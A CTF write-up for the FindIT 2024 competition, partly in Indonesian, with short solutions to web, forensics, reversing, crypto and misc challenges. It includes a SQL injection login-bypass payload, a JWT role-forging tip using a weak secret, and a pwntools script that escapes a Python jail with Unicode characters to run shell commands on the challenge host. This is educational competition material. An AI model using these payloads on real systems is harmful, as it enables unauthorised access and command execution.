FindIT 2024

indonesian ctf by UGM ( Universitas Gadjah Mada )

playing solo as N2L team

Chall	Category
Kue	web
login-dulu	web
bagas-dribble	forensic
file kosong	forensic
image cropper	forensic
is_this_python	reverse
how to decrypte?	crypto
your-journey	misc
neobim	misc

Kue

concept: basic jwt webex

tinggal edit rolesnya dgn secret your_secret gnti jadi admin

login-dulu

concept: sqli we must suply username admin and bypass the password

Username: admin Password: " union select rootpage, type, name from sqlite_master --

reff :

bagas-dribble

concept: basic stego

tinggal strings nemu flagnya

file kosong

foren/file kosong

concept : finding pattern

s = """Hex FIlenya taruh sini"""
s = s.replace('E2 80 83', '0').replace('20', '1').replace(' ', '')
for i in range(0, len(s), 8):
    print(chr(int(s[i:i+8], 2)), end='')

image cropper

concept : recover image from wav lsb decoding

import argparse
from PIL import Image
import numpy as np
import scipy.io.wavfile as wavfile
import base64

def restore_image(wav_input_path):
    # Read the WAV file
    sample_rate, audio_signal = wavfile.read(wav_input_path)

    # Extract red, green, and blue channels from the audio signal
    red_channel = audio_signal[::3]
    green_channel = audio_signal[1::3]
    blue_channel = audio_signal[2::3]

    # Reshape and normalize the channels
    red_channel = ((red_channel + 1) / 2 * 255).astype(np.uint8)
    green_channel = ((green_channel + 1) / 2 * 255).astype(np.uint8)
    blue_channel = ((blue_channel + 1) / 2 * 255).astype(np.uint8)

    # Combine channels to reconstruct the image
    image_size = int(np.sqrt(len(red_channel)))
    image_data = np.column_stack((red_channel, green_channel, blue_channel)).reshape((image_size, image_size, 3))
    # Save the image
    restored_image = Image.fromarray(image_data, 'RGB')
    pixels = list(restored_image.getdata())
    # pixelss = []
    # for i in range(len(pixels)):
        # pixelss.append((pixels[i][0]+1,pixels[i][1]+1,pixels[i][1]+2))
    x = ""
    cc = 0
    for i in pixels:
        if i[0] == 11 and i[0] % 2 == 1:
            x += "0"
        elif i[0] == 13 and i[0] % 2 == 1:
            x+="1"
        else:
            x+="1"
        if i[1] == 11 and i[1] % 2 == 1:
            x+="0"
        elif i[1] == 12 and i[1] % 2 == 1:
            x+="1"
        else:
            x+="1"
        if i[2] == 12 and i[2] % 2 == 0:
            x+="0"
        elif i[2] == 14 and i[2] % 2 == 0:
            x+="1"
        else:
            x+="1"
        if cc == 250:
            print(x)
        cc+=1

    print("Image restored successfully!")

if __name__ == "__main__":
    restore_image("encoded.wav")

is_this_python

concept : reversing pyc

# Define a key
key = '2024' + 'findit'

# Initialize an empty list to store the encoded flag
flag_enc = [113, 100, 116, 79, 4, 89, 2, 80, 54, 66, 83, 92, 3, 107, 8, 80, 9, 11, 54, 16, 93, 1, 83, 90, 82, 7, 49, 80, 80, 71, 10, 1, 1, 73]

# Initialize an empty list to store the key characters
key_arr = []

# Extract characters from the key and append their ASCII values to key_arr
for character in key:
    character = ord(character)
    key_arr.append(character)

# Initialize an empty list to store the flag in decimal form
flag_arr = []

# Convert hexadecimal values to decimal and append them to flag_arr
for hex_val in flag_enc:
    hex_val = int(hex_val)
    flag_arr.append(hex_val)

# Extend key_arr if its length is less than flag_arr
while len(flag_arr) > len(key_arr):
    key_arr.extend(key_arr)

# Initialize an empty list to store the flag in decimal form after XOR operation
flag_dec = []

# Perform XOR operation between corresponding elements of key_arr and flag_arr
for k, f in zip(key_arr, flag_arr):
    xored = k ^ f
    flag_dec.append(xored)

# Convert the decimal values to text characters
flag_dec_text = ''.join(map(chr, flag_dec))

# Print the result
print(flag_dec_text)

your-journey

concept : pyjail restriction bypass using unique char

from pwn import *
context.log_level="ERROR"
io = remote("103.191.63.187", 1337)  # Change IP and PORT
io.sendlineafter(b"$ ", '𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵'.encode())
io.sendlineafter(b"(Pdb) ",b"import os;os.system('grep -ra \"FindIT\"')")
print(io.recv().decode())

how to decrypte?

def caesar_decrypt(ciphertext):

    plaintext = ""

    for char in ciphertext:

        if char.isalpha():

            ascii_offset = ord('A') if char.isupper() else ord('a')

            decrypted_char = chr((ord(char) - ascii_offset - 4) % 26 + ascii_offset)

            plaintext += decrypted_char

        else:

            plaintext += char

    return plaintext

print(caesar_decrypt("JmrhMXGXJ{al4x_h03w_G43w4v_Hs_57lnkrzh8x5}"))

neobim

import httpx

URL = "https://discordapp.com/"

class BaseAPI:
    def __init__(self, url=URL) -> None:
        self.c = httpx.Client(base_url=url, follow_redirects=True)
    def get_assets(self, appid):
        return self.c.get(f"/api/oauth2/applications/{appid}/assets")
    def get_asset(self, appid, assetid):
        return self.c.get(f"https://cdn.discordapp.com/app-assets/{appid}/{assetid}.png")

class API(BaseAPI):
    ...

if __name__ == "__main__":
    api = API()
    appid = "1233467180696207390"
    res = api.get_assets(appid)
    for asset in res.json():
        res = api.get_asset(appid, asset["id"])
        with open(asset["name"]+".png", "wb") as f:
            f.write(res.content)

get the appid in the readme